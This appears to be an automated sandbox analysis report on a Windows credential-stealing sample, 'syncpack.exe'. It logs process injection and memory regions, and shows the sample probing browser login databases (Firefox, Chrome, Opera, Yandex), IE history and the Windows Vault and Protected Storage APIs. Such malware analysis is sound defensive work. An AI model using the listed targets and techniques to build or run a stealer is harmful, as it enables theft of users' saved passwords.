Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x730
0x7D4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
pagefile_0x0000000000210000 0x00210000 0x00210fff Pagefile Backed Memory Readable, Writable True False False -
rsaenh.dll 0x00220000 0x0025bfff Memory Mapped File Readable False False False -
private_0x0000000000220000 0x00220000 0x0025ffff Private Memory Readable, Writable True False False -
tzres.dll 0x00260000 0x00260fff Memory Mapped File Readable False False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00268fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00276fff Pagefile Backed Memory Readable True False False -
private_0x0000000000280000 0x00280000 0x0028ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00291fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x0031ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00328fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0045afff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory Readable, Writable True False False -
private_0x0000000000560000 0x00560000 0x0065ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000660000 0x00660000 0x007e7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007f0000 0x007f0000 0x00970fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000980000 0x00980000 0x01d7ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d80000 0x01d80000 0x01e7ffff Private Memory Readable, Writable True False False -
private_0x0000000001f20000 0x01f20000 0x01f2ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01f30000 0x021fefff Memory Mapped File Readable False False False -
private_0x0000000002200000 0x02200000 0x02300fff Private Memory Readable, Writable True False False -
nss3.dll 0x02200000 0x023b1fff Memory Mapped File Readable False False False -
private_0x0000000002200000 0x02200000 0x0236ffff Private Memory Readable, Writable True False False -
private_0x0000000002200000 0x02200000 0x022fffff Private Memory Readable, Writable True False False -
private_0x0000000002330000 0x02330000 0x0236ffff Private Memory Readable, Writable True False False -
private_0x0000000002370000 0x02370000 0x0246ffff Private Memory Readable, Writable True False False -
private_0x0000000002470000 0x02470000 0x0256ffff Private Memory Readable, Writable True False False -
private_0x0000000002500000 0x02500000 0x025fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002600000 0x02600000 0x029f2fff Pagefile Backed Memory Readable True False False -
msvcp100.dll 0x6fe00000 0x6fe68fff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x6fe40000 0x6fe53fff Memory Mapped File Readable, Writable, Executable False False False -
pstorec.dll 0x6fe60000 0x6fe6cfff Memory Mapped File Readable, Writable, Executable False False False -
mozglue.dll 0x6fec0000 0x6fee1fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x6fef0000 0x6ffadfff Memory Mapped File Readable, Writable, Executable False False False -
wsock32.dll 0x6ffb0000 0x6ffb6fff Memory Mapped File Readable, Writable, Executable False False False -
nss3.dll 0x6ffc0000 0x70174fff Memory Mapped File Readable, Writable, Executable False False False -
vaultcli.dll 0x70180000 0x7018bfff Memory Mapped File Readable, Writable, Executable False False False -
winmm.dll 0x70250000 0x70281fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
softokn3.dll 0x74690000 0x746b6fff Memory Mapped File Readable, Writable, Executable False False False -
freebl3.dll 0x74a30000 0x74a7efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x75020000 0x750a3fff Memory Mapped File Readable, Writable, Executable False False False -
nssdbm3.dll 0x750d0000 0x750e6fff Memory Mapped File Readable, Writable, Executable False False False -
freebl3.dll 0x755d0000 0x7561efff Memory Mapped File Readable, Writable, Executable False False False -
nssdbm3.dll 0x755d0000 0x755e6fff Memory Mapped File Readable, Writable, Executable False False False -
softokn3.dll 0x755f0000 0x75616fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75f30000 0x75faafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77650000 0x77654fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x400000, size = 372736 True 1 Fn Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x7efde008, size = 4 True 1 Fn Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x7efdf010, size = 4 True 1 Fn Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 os_tid = 0x730, address = 0x0 True 1 Fn
Host Behavior
File (226)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1 Fn
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1 Fn
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1 Fn
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1 Fn
Create C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\places.sqlite desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_lng.ini type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat type = size True 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat type = size True 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat type = size True 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat type = size True 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\history.dat type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\places.sqlite type = file_attributes True 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\places.sqlite type = time True 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini type = file_attributes True 1 Fn
Get Info C:\Program Files (x86)\Mozilla Firefox\nss3.dll type = file_attributes True 3 Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\logins.json type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\signons.sqlite type = file_attributes True 1 Fn
Get Info C:\Program Files (x86)\Mozilla Firefox\sqlite3.dll type = file_attributes False 1 Fn
Get Info C:\Program Files (x86)\Mozilla Firefox\mozsqlite3.dll type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini type = file_attributes False 1 Fn
Get Info C:\Program Files (x86)\Sea Monkey\nss3.dll type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Web Data type = file_attributes True 1 Fn
Get Info - type = size, size_out = 0 True 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data type = file_attributes True 1 Fn
Get Info - type = size, size_out = 0 True 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\pnacl\Web Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\pnacl\Login Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data type = file_attributes False 1 Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Apple Computer\Preferences\keychain.plist type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Opera\Opera\wand.dat type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Opera\Opera7\profile\wand.dat type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Opera Software\Opera Stable\Login Data type = file_attributes False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 8, size_out = 8 True 23
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 256, size_out = 256 True 23
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat size = 8, size_out = 8 True 2
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat size = 256, size_out = 256 True 2
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 8, size_out = 8 True 2
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 256, size_out = 256 True 2
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat size = 8, size_out = 8 True 94
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat size = 256, size_out = 256 True 2
Fn
Data
Write - size = 3 True 1
Fn
Data
Write - size = 1 True 8
Fn
Data
Write - size = 11 True 1
Fn
Data
Write - size = 9 True 1
Fn
Data
Write - size = 8 True 1
Fn
Data
Write - size = 17 True 1
Fn
Data
Write - size = 15 True 1
Fn
Data
Write - size = 14 True 1
Fn
Data
Write - size = 12 True 1
Fn
Data
Write - size = 13 True 1
Fn
Data
Write - size = 2 True 1
Fn
Data
Registry (15)
Operation Key Additional Information Success Count Logfile
Open Key Mozilla Firefox\bin - False 3
Fn
Open Key Mozilla Firefox 25.0\bin - True 1
Fn
Open Key Mozilla Firefox 25.0\bin - True 1
Fn
Open Key Mozilla Firefox 25.0\bin - True 1
Fn
Read Value Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Read Value Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Read Value Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Enumerate Keys - - True 3
Fn
Enumerate Keys - - False 3
Fn
Process (66)
Operation Process Additional Information Success Count Logfile
Get filename c:\windows\system32\taskhost.exe file_name = C:\Windows\System32\taskhost.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Get filename c:\windows\system32\dwm.exe file_name = C:\Windows\System32\dwm.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Get filename c:\windows\explorer.exe file_name = C:\Windows\explorer.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Get filename c:\windows\system32\conhost.exe file_name = C:\Windows\System32\conhost.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files\windows photo viewer\lies.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\reference assemblies\senttracebowlingnames.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\common files\signals cite try strings.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\reference assemblies\victoria_purchased_scales_ecology.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows defender\rehabdroptracy.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows photo viewer\stating conditions loss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\mozilla maintenance service\erignoredwellserving.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\common files\fixtures counting blink.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\dvd maker\wr_lotus.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows portable devices\biblical.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\adobe\theta islands installed.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\sdclt.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\dvd maker\kennedy_analysis_graduate_livestock.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\uninstall information\all.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\reference assemblies\filled_throat_champions.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows nt\midnight-consulting-maintenance.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\mozilla firefox\ethnic.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft.net\pleasure eventually spy reasonable.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows nt\jeanelectricaldevelopmentteens.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows nt\ireland.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft visual studio\question apple.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows nt\cache_mitchell.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft.net\html contract.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\splwow64.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wbem\wmiadap.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\programdata\surtq5qk9h.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\programdata\oyvgkgw.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\syswow64\cmd.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\syswow64\windowspowershell\v1.0\powershell.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module (69)
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x75020000 True 1
Fn
Load shell32.dll base_address = 0x76480000 True 1
Fn
Load pstorec.dll base_address = 0x6fe60000 True 1
Fn
Load vaultcli.dll base_address = 0x70180000 True 1
Fn
Load C:\Program Files (x86)\Mozilla Firefox\nss3.dll base_address = 0x6ffc0000 True 1
Fn
Get Handle private_0x0000000000400000 base_address = 0x400000 True 22
Fn
Get Handle C:\Program Files (x86)\Mozilla Firefox\nss3.dll base_address = 0x0 False 1
Fn
Get Handle c:\program files (x86)\mozilla firefox\nss3.dll base_address = 0x6ffc0000 True 2
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 2
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll function = InitCommonControlsEx, address_out = 0x75026be6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x764a0468 True 1
Fn
Get Address c:\windows\syswow64\pstorec.dll function = PStoreCreateInstance, address_out = 0x6fe6526c True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultOpenVault, address_out = 0x701826a9 True 1
Fn
